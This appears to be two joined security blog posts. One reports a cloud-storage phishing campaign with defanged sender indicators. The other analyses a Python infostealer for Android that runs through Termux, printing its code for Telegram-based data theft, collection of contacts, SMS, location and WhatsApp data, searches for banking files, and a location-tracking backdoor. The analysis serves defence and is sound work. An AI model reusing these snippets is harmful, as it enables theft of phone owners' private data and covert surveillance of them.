Phishing Cloud Account for Information
Over the past two months, my outlook account has been receiving phishing email regarding cloud storage payments, mostly in French and some English with the usual warning such as the account is about to be locked, space is full, loss of data, refused payment, expired payment method, etc.
Some of the emails have some typical minor spelling errors. The message is essentially the same, asking to log in before losing any data. The same interface shows the same data in both languages.
Reviewing Storage Options from thee URL from French and English emails shows the same message in both languages.
This is a sample list of phishing emails received over the past 2 months all with the same theme:
Indicators
Support du stockage cloud<indigo.thomas@gamepanditos[.]org>
Cloud Billing Team<max.walker@gamepanditos[.]org>
Dernier rappel<scout.jones@gulalguru[.]org>
Support Technique Cloud<lane.lee@manyn[.]org>
Support Technique Cloud<logan.king@crickstrike[.]org>
ssistance Cloud Sécurisée<finley.ramirez@dudugo[.]space>
Sécurité Cloud<indigo.anderson@badideaai[.]space>
[1] https://www.ftc.gov/business-guidance/small-businesses/cybersecurity/phishing
[2]] https://www.itgovernance.co.uk/blog/5-ways-to-detect-a-phishing-email
[3] https://www.cyber.gc.ca/en/guidance/spotting-malicious-email-messages-itsap00100
[4] https://www.sans.org/for-organizations/workforce/security-awareness-training/phishing
[5] https://www.sans.org/blog/phishing-its-no-longer-about-malware-or-even-email
-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
Infostealer Targeting Android Devices
Infostealers landscape exploded in 2024 and they remain a top threat today. If Windows remains a nice target (read: Attackers' favorite), I spotted an Infostealer targeting Android devices. This sounds logical that attackers pay attention to our beloved mobile devices because all our life is stored on them.
The sample that I found (SHA256: 7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182) received a VT score of 0/64[1]! Undetected! The source code contains comments in Vietnamese. The sample is a Python script. How can you execute Python code on an Android device? Say hello to Termux, your new best friend.
From the documentation: "Termux[2] is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager."
Sounds great to run Python code.
Once Termux is installed, add the Python package:
$ pkg install python
The infostealer is classic and exfiltrate data through a Telegram channel:
def send_telegram(msg):
try:
url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
data = {"chat_id": CHAT_ID, "text": msg}
requests.post(url, data=data, timeout=10)
except: pass
But, how can the malware access Android data? Termux comes with a suite a command-line tools that provide juicy information. For example, termux-contact-list[3] returns a list of contacts stored in the phone in JSON:
[
{
"id": 1,
"name": "Alice Dupont",
"phone_numbers": [
"+32470123456",
"+3221234567"
],
"emails": [
"alice.dupont@example.com"
]
},
{
"id": 2,
"name": "Bob Martin",
"phone_numbers": [
"+32475123456"
],
"emails": []
},
{
"id": 3,
"name": "Caroline Smith",
"phone_numbers": [],
"emails": [
"caroline.smith@company.com",
"c.smith@gmail.com"
]
}
]
The infostealer will collect and exfiltrate the following information:
contacts = subprocess.getoutput('termux-contact-list')
sms = subprocess.getoutput('termux-sms-list')
call_log = subprocess.getoutput('termux-call-log')
location = subprocess.getoutput('termux-location')
The malware tries also to exfiltrate data from apps like Facebook and Whatsapp. How? In the Android ecosystem, Termux is running in a sandbox and has access only to its own $HOME directory:
/data/data/com.termux/files/home
But another tools is provided: termux-setup-storage. That one will allow access to the phone storage through a mapping lile:
/storage/emulated/0/<dir>
Note that the victim will be prompted with a dialog prompt asking right to access data. But they’ll do right?
The malware will try to exfiltrate more data:
fb_paths = [
'/storage/emulated/0/Android/data/com.facebook.katana/',
'/storage/emulated/0/Facebook/'
]
wa_paths = [
'/storage/emulated/0/WhatsApp/Databases/msgstore.db',
'/storage/emulated/0/WhatsApp/Databases/wa.db',
'/sdcard/WhatsApp/Databases/msgstore.db'
]
media_paths = [
'/storage/emulated/0/DCIM/',
'/storage/emulated/0/Pictures/',
'/storage/emulated/0/Movies/',
'/storage/emulated/0/Download/'
]
It will also search for banking related information:
banking_files = []
for root, dirs, files in os.walk('/storage/emulated/0/'):
for file in files:
if any(keyword in file.lower() for keyword in ['bank', 'atm', 'vietcombank', 'vpbank', 'mbbank', 'acb']):
banking_files.append(os.path.join(root, file))
Get device info:
device_model = subprocess.getoutput('getprop ro.product.model')
android_version = subprocess.getoutput('getprop ro.build.version.release')
device_name = subprocess.getoutput('getprop ro.product.device')
A backdoor will be installed:
def install_backdoor():
try:
backdoor_script = '''
import os, time, requests
while True:
try:
os.system("termux-location > /data/data/com.termux/files/home/location.txt")
time.sleep(300)
except:
time.sleep(60)
'''
with open('/data/data/com.termux/files/home/backdoor.py', 'w') as f:
f.write(backdoor_script)
os.system('python3 /data/data/com.termux/files/home/backdoor.py &')
except: pass
I just found the infostealer and I don’t know the complete infection path. How was Termux installed? Is it a PoC? But, for sure, Android devices can also be targeted!
[1] https://www.virustotal.com/gui/file/7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182
[2] https://termux.dev/en/
[3] https://wiki.termux.com/wiki/Termux-contact-list
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments